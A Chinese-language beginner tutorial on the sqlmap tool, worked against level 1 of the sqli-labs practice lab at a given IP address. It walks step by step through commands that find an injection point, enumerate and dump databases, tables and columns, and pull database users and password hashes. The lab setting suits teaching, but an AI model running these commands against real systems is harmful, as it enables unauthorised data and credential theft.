本文主要介绍了SQL注入之sqlmap入门学习,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
原来sql注入如此简单
以SQL注入靶场sqli-labs第一关为例,进行sqlmap工具的使用分享。
一、判断是否存在注入点
使用命令:
使用命令:sqlmap -u "http://49.232.78.252:83/Less-1/?id=1"
有图中白色背景的 则判断出有注入点
二、查询当前用户下所有数据库
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --dbs
可以看到有五个表
三、获取数据库中的表名
选取一个challenges数据库,获取此库的表名
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges --tables
四、获取表中的字段名
选取表T5M0QG6FM2,获取其中字段名
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 –columns
五、获取字段内容
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 --columns –dump
六、获取数据库的所有用户
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –users
使用该命令就可以列出所有管理用户
七、获取数据库用户的密码
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –passwords
八、获取当前网站数据库的名称
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-db
可以看到当前的数据库是 security
九、获取当前网站数据库的用户名称
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-user
当前用户是root
到此这篇关于SQL注入之sqlmap入门学习的文章就介绍到这了,更多相关sqlmap入门内容请搜索编程学习网以前的文章希望大家以后多多支持编程学习网!
沃梦达教程
本文标题为:SQL注入之sqlmap入门学习
猜你喜欢
- 在阿里云CentOS 6.8上安装Redis 2023-09-12
- MySQL8.0.28安装教程详细图解(windows 64位) 2023-07-26
- Mongodb启动报错完美解决方案:about to fork child process,waiting until server is ready for connections. 2023-07-16
- 基于Python制作一个简单的文章搜索工具 2023-07-28
- redis清除数据 2023-09-13
- Numpy中如何创建矩阵并等间隔抽取数据 2023-07-28
- Oracle 删除大量表记录操作分析总结 2023-07-23
- 搭建单机Redis缓存服务的实现 2023-07-13
- SQL Server 2022 AlwaysOn新特性之包含可用性组详解 2023-07-29
- SQLSERVER调用C#的代码实现 2023-07-29